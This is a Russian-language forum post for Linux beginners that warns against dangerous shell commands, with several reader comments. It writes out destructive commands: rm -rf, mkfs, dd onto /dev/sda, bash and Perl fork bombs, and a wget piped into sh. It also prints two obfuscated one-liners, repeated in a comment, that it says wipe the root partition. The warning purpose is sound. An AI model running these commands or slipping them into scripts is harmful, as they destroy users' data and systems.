Информация для новичков
(OFF) Lum (S) 8 ноя 2011

Опасные команды

Устанавливая программы и запуская разные скрипты и сценарии, взятые с сайтов в интернете, вы подвергаете свою систему значительной опасности. В них могут содержаться вредоносные команды. Проверяйте скрипты и сценарии из недоверенных источников, открывая их в текстовых редакторах, прежде чем запустить!

Вот наиболее известные.

Удаление. Удаляет все файлы, текущую директорию и все видимые файлы в текущей директории. По моему, достаточно ясно, почему эти команды опасны для запуска.

rm -rf в любых вариациях
rm -r .[^.]*

К сожалению, примеры вновь стали проявлятся. 27.05.2011 на сайте gnome-look.org был обнаружен deb-файл, устанавливающий, якобы тему для рабочего стола. В директории Debian, как оказалось, содержался скрипт с вышеуказанной командой. Контент, конечно, удален, но полностью избежать подобных эксцессов не удастся. Будьте бдительны.

Переформатирование: Данные на устройстве указанном после команды mkfs будут уничтожены и заменены на чистую файловую систему.

mkfs
mkfs.ext3
mkfs.blablabla


Манипуляции с блочным устройством: "Сырые" данные будут записаны на блочное устройство. В большинстве случаев, это приведёт к полному затиранию файловой системы и потере всей информации:

любая_команда > /dev/sda
dd if=какой-то_файл of=/dev/sda


Forkbomb: Запускает огромное количество процессов, до тех пор пока система не зависнет, принуждая вас сделать жёсткую перезагрузку, которая может привести к утрате, повреждению данных или другим ужасным последствиям. В Bourne-подобных оболочках, например такой как Bash: (Это выглядит действительно любопытно и провоцирующие)

: (){ :|:& };:
НаPerl:
fork while fork


TAR-бомба: Кто-то просит вас распаковать tar архив в существующую директорию. Такой архив может содержать миллионы файлов или проникать в систему угадывая имена файлов. Вы должны взять за правило, распаковывать архивы только во вновь созданные директории.

Распаковывающаяся бомба: Кто-то просит вас распаковать архив, который на первый взгляд выглядит легким для закачки. На самом деле это данные запакованные с высокой степенью сжатия и при распаковке они будут заполнять ваш жёсткий диск, раздуваясь на сотни гигабайт. Не берите архивы с непроверенных источников.

Скрипт командной оболочки: Кто-то даёт вам ссылку на скрипт командной оболочки для запуска. Он может содержать любые команды как неопасные, так и зловредные. Не запускайте код, полученный от людей, которым вы не доверяете.

wget httр://какое-то_место/какой-то_файл
sh ./какой-то_файл


аналогично:

wget httр://какое-то_место/какой-то_файл -O- | sh

Скачивает и запускает сразу скрипт, вы не успеваете его даже просмотреть.

Код компиляции: Кто-то даёт вам исходные коды и затем просит вам их откомпилировать. Очень просто спрятать вредоносный код где-нибудь внутри большого куска исходного кода и исходный код даёт атакующему гораздо больше возможностей для маскировки вредоносной информации. Не компилируйте и не запускайте откомпилированный код, если это не код хорошо известного приложения, полученный с доверенного сайта (например SourceForge, домашняя страница автора или официальный сайт дистрибутива)

Для начинающих пользователей это выглядит как "непонятный набор hex кодов", который так типичен для пробных версий. Как бы то ни было, на самом деле запускается команда rm -rf ~ / &, которая уничтожает вашу домашнюю директорию, если вы под обычным пользователем и все файлы в текущей директории (возможно и в корневой), если вы под суперпользователем. Если вы можете различить команду в этом коде, значит вам не нужно читать эту тему. В противном случае, помните, что такие вещи могут встречаться в любых подобных кодах - будьте осторожны.

Ещё несколько опасных примеров.

Программа из одной строчки на Perl:

cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Удаляет все каталоги в корневой директории!

под bash'ем из-под рута:

ISF=$(echo '%\%#{<-{}<&{`' |tr ' -/:-@[-`{}' '`-{/ -');$ISF 2>/dev/null

Команда молча потрёт весь корневой раздел!


Лучшим решением будет установка из проверенных источников, так будет максимально безопасно.

Скачивая контент с сайтов http://gnome-look.org http://kde-look.org http://xfce-look.org http://kde-apps.org http://debian-art.org http://suse-art.org http://fedora-art.org http://ubuntu-art.org http://opendesktop.org обратите внимание на дату, комментарии и количество скачиваний, только что размещённый контент может быть потенциально опасен, там практически никто ничего не проверяет, удаления происходят по жалобам пользователей.

P.S. Убедительная просьба не испытывать команды "на прочность". Часть команд может и не работать, но все же...

P.S.S. Помним, что применение подобных команд в отношении пользователей является, в соответствии в Уголовным Кодексом РФ, уголовно-наказуемым деянием (ст.ст. 273, 274 УК РФ)


Комментарии (30)

(B)
echo "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
это rm -rf /*
да для криворуких пользователей даже ping - опасная команда. видите ли, они не знают, как её остановить)
ответил _100_Pinchy
:лол
perl - мутный язык для мутных людей.
+1, хорошая статья
ответил Baz50
...с мутной кодировкой хД
Допустим я незнаю что делает команда ping.
ответил Basster
опрашивает узел в сети.
Комментарий скрыт
так вот Что было у меня в 8.10 :) архив бомба, а Я то голову ломал куда место делось после распаковки архива весом в 95Метров хотя было 80 Гектаров :)
Показать комментарий
Скрыть комментарий
Назад 1 из 3 Вперёд
Для добавления комментариев необходимо авторизоваться
Информация для новичков
Битва танков
Управляй многотонной боевой машиной, участвуй...
Тема: Светлая | Тёмная
Версия: Mobile | Lite | Touch | Доступно в Google Play